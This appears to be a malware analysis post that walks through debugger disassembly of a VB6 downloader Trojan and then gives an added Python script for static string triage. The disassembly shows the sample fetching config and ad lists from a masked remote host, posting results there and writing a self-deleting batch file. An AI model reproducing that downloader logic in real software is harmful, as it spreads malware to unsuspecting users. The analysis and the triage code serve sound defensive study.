Analysis of a traffic Trojan from a fake website

Source: Internet
Author: User

After the system was fully patched, browsing around still connected me to www.net.cn now .... and it dropped its web Trojan on me. Not bad, really not bad at all. Kills 98, NT, 2000, XP, XP SP2 and 2003. I kept a copy for myself and analyzed the Trojan. It is a traffic Trojan, the server side. All the little "pony" downloaders are in here now.
Lightly packed, written in VB.
00403DAD  .  FF15 54104000   CALL DWORD PTR DS:[<&MSVBVM60.__vbaHresultCheckObj>]  ; MSVBVM60.__vbaHresultCheckObj
00403DB3  .  8985 E0FCFFFF   MOV DWORD PTR SS:[EBP-320],EAX
00403DB9  .  EB 0A           JMP SHORT Rundll32.00403DC5
00403DBB  >  C785 E0FCFFFF>  MOV DWORD PTR SS:[EBP-320],0
00403DC5  >  8B95 60FEFFFF   MOV EDX,DWORD PTR SS:[EBP-1A0]
00403DCB  .  8995 F8FCFFFF   MOV DWORD PTR SS:[EBP-308],EDX
00403DD1  .  C785 60FEFFFF>  MOV DWORD PTR SS:[EBP-1A0],0
00403DDB  .  8B85 F8FCFFFF   MOV EAX,DWORD PTR SS:[EBP-308]
00403DE1  .  8985 34FEFFFF   MOV DWORD PTR SS:[EBP-1CC],EAX
00403DE7  .  C785 2CFEFFFF>  MOV DWORD PTR SS:[EBP-1D4],8
00403DF1  .  8D95 2CFEFFFF   LEA EDX,DWORD PTR SS:[EBP-1D4]
00403DF7  .  8D8D F8FEFFFF   LEA ECX,DWORD PTR SS:[EBP-108]
00403DFD  .  FF15 08104000   CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarMove>]  ; MSVBVM60.__vbaVarMove
00403E03  .  C745 FC 06000>  MOV DWORD PTR SS:[EBP-4],6
00403E0A  .  C785 D4FDFFFF>  MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>  ; UNICODE "Http://www.xxxxxxxx.com/tc/adset.txt"
00403E14  .  C785 CCFDFFFF>  MOV DWORD PTR SS:[EBP-234],8
00403E1E  .  8D95 CCFDFFFF   LEA EDX,DWORD PTR SS:[EBP-234]
00403E24  .  8D4D A0         LEA ECX,DWORD PTR SS:[EBP-60]
00403E27  .  FF15 70114000   CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarCopy>]  ; MSVBVM60.__vbaVarCopy
00403E2D  .  C745 FC 07000>  MOV DWORD PTR SS:[EBP-4],7
00403E34  .  C785 D4FDFFFF>  MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>  ; UNICODE "Http://www.xxxxxxxx.com/tc/adlist.txt"
00403E3E  .  C785 CCFDFFFF>  MOV DWORD PTR SS:[EBP-234],8
00403E48  .  8D95 CCFDFFFF   LEA EDX,DWORD PTR SS:[EBP-234]
00403E4E  .  8D8D 6CFFFFFF   LEA ECX,DWORD PTR SS:[EBP-94]
00403E54  .  FF15 70114000   CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarCopy>]  ; MSVBVM60.__vbaVarCopy
00403E5A  .  C745 FC 08000>  MOV DWORD PTR SS:[EBP-4],8
00403E61  .  C785 D4FDFFFF>  MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>  ; UNICODE "Http://www.xxxxxxxx.com/tc/MMResult.asp"
00403E6B  .  C785 CCFDFFFF>  MOV DWORD PTR SS:[EBP-234],8
00403E75  .  8D95 CCFDFFFF   LEA EDX,DWORD PTR SS:[EBP-234]
00403E7B  .  8D4D 8C         LEA ECX,DWORD PTR SS:[EBP-74]
00403E7E  .  FF15 70114000   CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarCopy>]  ; MSVBVM60.__vbaVarCopy
00403E84  .  C745 FC 09000>  MOV DWORD PTR SS:[EBP-4],9
00403E8B  .  C785 D4FDFFFF>  MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>  ; UNICODE "Http://www.xxxxxxxx.com/tc/adiepage.txt"
00403E95  .  C785 CCFDFFFF>  MOV DWORD PTR SS:[EBP-234],8
00403E9F  .  8D95 CCFDFFFF   LEA EDX,DWORD PTR SS:[EBP-234]
00403EA5  .  8D8D B8FEFFFF   LEA ECX,DWORD PTR SS:[EBP-148]
00403EAB  .  FF15 70114000   CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarCopy>]  ; MSVBVM60.__vbaVarCopy
00403EB1  .  C745 FC 0A000>  MOV DWORD PTR SS:[EBP-4],0A
00403EB8  .  C785 D4FDFFFF>  MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>  ; UNICODE "Http://www.xxxxxxxx.com/tc/ieFavorites.txt"
00403EC2  .  C785 CCFDFFFF>  MOV DWORD PTR SS:[EBP-234],8
00403ECC  .  8D95 CCFDFFFF   LEA EDX,DWORD PTR SS:[EBP-234]
00403ED2  .  8D8D 7CFFFFFF   LEA ECX,DWORD PTR SS:[EBP-84]
00403ED8  .  FF15 70114000   CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarCopy>]  ; MSVBVM60.__vbaVarCopy
00403EDE  .  C745 FC 0B000>  MOV DWORD PTR SS:[EBP-4],0B
00403EE5  .  C785 D4FDFFFF>  MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>  ; UNICODE "WinDir"
00403EEF  .  C785 CCFDFFFF>  MOV DWORD PTR SS:[EBP-234],8
00403EF9  .  8D95 CCFDFFFF   LEA EDX,DWORD PTR SS:[EBP-234]
00403EFF  .  8D8D 2CFEFFFF   LEA ECX,DWORD PTR SS:[EBP-1D4]
00403F05  .  FF15 6C114000   CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarDup>]  ; MSVBVM60.__vbaVarDup
00403F0B  .  8D8D 2CFEFFFF   LEA ECX,DWORD PTR SS:[EBP-1D4]
00403F11  .  51              PUSH ECX
00403F12  .  8D95 1CFEFFFF   LEA EDX,DWORD PTR SS:[EBP-1E4]
00403F18  .  52              PUSH EDX
00403F19  .  FF15 60104000   CALL DWORD PTR DS:[<&MSVBVM60.rtcEnvironVar>]  ; MSVBVM60.rtcEnvironVar
00403F1F  .  C785 C4FDFFFF>  MOV DWORD PTR SS:[EBP-23C],Rundll32.0040>  ; UNICODE "undll32.exe"
00403F29  .  C785 BCFDFFFF>  MOV DWORD PTR SS:[EBP-244],8

The program connects to Http://www.xxxxxxxx.com and accesses tc/MMResult.asp.

Generating a file
00404DA2  ./ EB 0A           JMP SHORT Rundll32.00404DAE                  // get the file path off the stack
00404DA4  >| C785 88FCFFFF>  MOV DWORD PTR SS:[EBP-378],0
00404DAE  >  8B85 60FEFFFF   MOV EAX,DWORD PTR SS:[EBP-1A0]              // my program's path is "D:\fuck you\"
00404DB4  .  50              PUSH EAX                                     // the path, in EAX
00404DB5  .  68 80274000     PUSH Rundll32.00402780                       // "killme.bat"
00404DBA  .  FF15 48104000   CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCat>]  ; MSVBVM60.__vbaStrCat
00404DC0  .  8BD0            MOV EDX,EAX                                  // path + file name: D:\fuck you\killme.bat
00404DC2  .  8D8D 5CFEFFFF   LEA ECX,DWORD PTR SS:[EBP-1A4]
00404DC8  .  FF15 80114000   CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrMove>]  ; MSVBVM60.__vbaStrMove
00404DCE  .  50              PUSH EAX
00404DCF  .  6A 01           PUSH 1
00404DD1  .  6A FF           PUSH -1
00404DD3  .  6A 02           PUSH 2
00404DD5  .  FF15 28114000   CALL DWORD PTR DS:[<&MSVBVM60.__vbaFileOpen>]  ; MSVBVM60.__vbaFileOpen
00404DDB  .  8D8D 5CFEFFFF   LEA ECX,DWORD PTR SS:[EBP-1A4]
00404DE1  .  51              PUSH ECX
00404DE2  .  8D95 60FEFFFF   LEA EDX,DWORD PTR SS:[EBP-1A0]
00404DE8  .  52              PUSH EDX
00404DE9  .  6A 02           PUSH 2
00404DEB  .  FF15 48114000   CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeStrList>]  ; MSVBVM60.__vbaFreeStrList
00404DF1  .  83C4 0C         ADD ESP,0C
00404DF4  .  8D8D 40FEFFFF   LEA ECX,DWORD PTR SS:[EBP-1C0]
00404DFA  .  FF15 A8114000   CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeObj>]  ; MSVBVM60.__vbaFreeObj
00404E00  .  C745 FC 23000>  MOV DWORD PTR SS:[EBP-4],23
00404E07  .  68 9C274000     PUSH Rundll32.0040279C                       ; "@echo off"
00404E0C  .  6A 01           PUSH 1
00404E0E  .  68 B4274000     PUSH Rundll32.004027B4
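The URL constants in the first listing and the batch-file strings in the second are ordinary VB6 string constants, stored as NUL-terminated UTF-16LE in the image, so once the light packer has been stripped they can be recovered statically instead of single-stepping through one MOV at a time. The Python script below is an added example for this page, not code from the original post or from the sample. The byte string it scans is constructed here to mimic what the two listings show (five URLs on one host, the "WinDir" variable name that goes to rtcEnvironVar, "killme.bat" for the __vbaStrCat call, and the "@echo off" line written through the file opened by __vbaFileOpen) and is not the real binary; the marker list and the verdict heuristic are assumptions drawn from those strings. It extracts the UTF-16LE runs, groups the URLs by host and flags the batch-dropper markers.

```python
"""Static triage of a lightly packed VB6 downloader (added example).

Recovers the UTF-16LE string constants that the debugger listing shows one
MOV at a time: the config/result URLs, the environment variable the sample
resolves, and the fragments of the self-deleting batch file it writes.
Run it on an unpacked dump; on the packed file the constants are not
visible until the packer stub has run.
"""
import re
from typing import Dict, List


def _u(s: str) -> bytes:
    """NUL-terminated UTF-16LE, the layout of a VB6 string constant."""
    return s.encode("utf-16-le") + b"\x00\x00"


# Constructed stand-in for an unpacked image: string constants interleaved
# with code bytes. Assumed layout for illustration, not the real sample.
SAMPLE_IMAGE = (
    b"\x55\x8b\xec\x83\xec\x0c"            # filler: push ebp / mov ebp,esp / sub esp,0C
    + _u("Http://www.xxxxxxxx.com/tc/adset.txt")
    + _u("Http://www.xxxxxxxx.com/tc/adlist.txt")
    + _u("Http://www.xxxxxxxx.com/tc/MMResult.asp")
    + _u("Http://www.xxxxxxxx.com/tc/adiepage.txt")
    + _u("Http://www.xxxxxxxx.com/tc/ieFavorites.txt")
    + _u("WinDir")
    + b"\x8b\xd0\x8d\x8d\x5c\xfe\xff\xff"  # filler: mov edx,eax / lea ecx,[ebp-1A4]
    + _u("killme.bat")
    + _u("@echo off")
    + b"\xc3"                              # filler: ret
)

URL_RE = re.compile(r"^https?://", re.IGNORECASE)

# Strings from the listing that mark the batch-file drop: the %WinDir%
# lookup via rtcEnvironVar, the .bat name built with __vbaStrCat, and the
# first line written to the file (assumed marker set).
DROPPER_MARKERS = ("windir", ".bat", "@echo off")


def extract_utf16_strings(image: bytes, min_len: int = 4) -> List[str]:
    """Return every run of at least min_len printable UTF-16LE characters.

    A printable ASCII code unit is one byte in 0x20..0x7E followed by 0x00;
    scanning at every byte offset avoids missing unaligned constants.
    """
    run = re.compile(rb"(?:[\x20-\x7e]\x00){" + str(min_len).encode() + rb",}")
    return [m.group().decode("utf-16-le") for m in run.finditer(image)]


def triage(image: bytes) -> Dict[str, List[str]]:
    """Bucket recovered strings into URLs, their hosts, dropper markers, other."""
    report: Dict[str, List[str]] = {"urls": [], "hosts": [], "dropper_markers": [], "other": []}
    for s in extract_utf16_strings(image):
        low = s.lower()
        if URL_RE.match(s):
            report["urls"].append(s)
            host = s.split("/", 3)[2].lower()
            if host not in report["hosts"]:
                report["hosts"].append(host)
        elif any(marker in low for marker in DROPPER_MARKERS):
            report["dropper_markers"].append(s)
        else:
            report["other"].append(s)
    return report


def looks_like_traffic_trojan(report: Dict[str, List[str]]) -> bool:
    """Heuristic taken from the listing: config/result fetches from a single
    host plus a batch-file drop. A triage aid, not a signature."""
    fetches_config = any(u.lower().endswith((".txt", ".asp")) for u in report["urls"])
    drops_batch = any(m.lower().endswith(".bat") for m in report["dropper_markers"])
    writes_batch = any(m.lower() == "@echo off" for m in report["dropper_markers"])
    return len(report["hosts"]) == 1 and fetches_config and drops_batch and writes_batch


if __name__ == "__main__":
    rep = triage(SAMPLE_IMAGE)
    for bucket, items in rep.items():
        print(f"{bucket}:")
        for item in items:
            print(f"  {item}")
    print("verdict:", "traffic-trojan downloader" if looks_like_traffic_trojan(rep) else "inconclusive")
```

The host list is the useful output for blocking and for pivoting: every URL in the listing sits under one host, so a single DNS or proxy rule covers the config fetch, the result post and the ad lists. The marker list is deliberately short; widen it for other families, and expect garbage strings from real images that the "other" bucket will catch.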
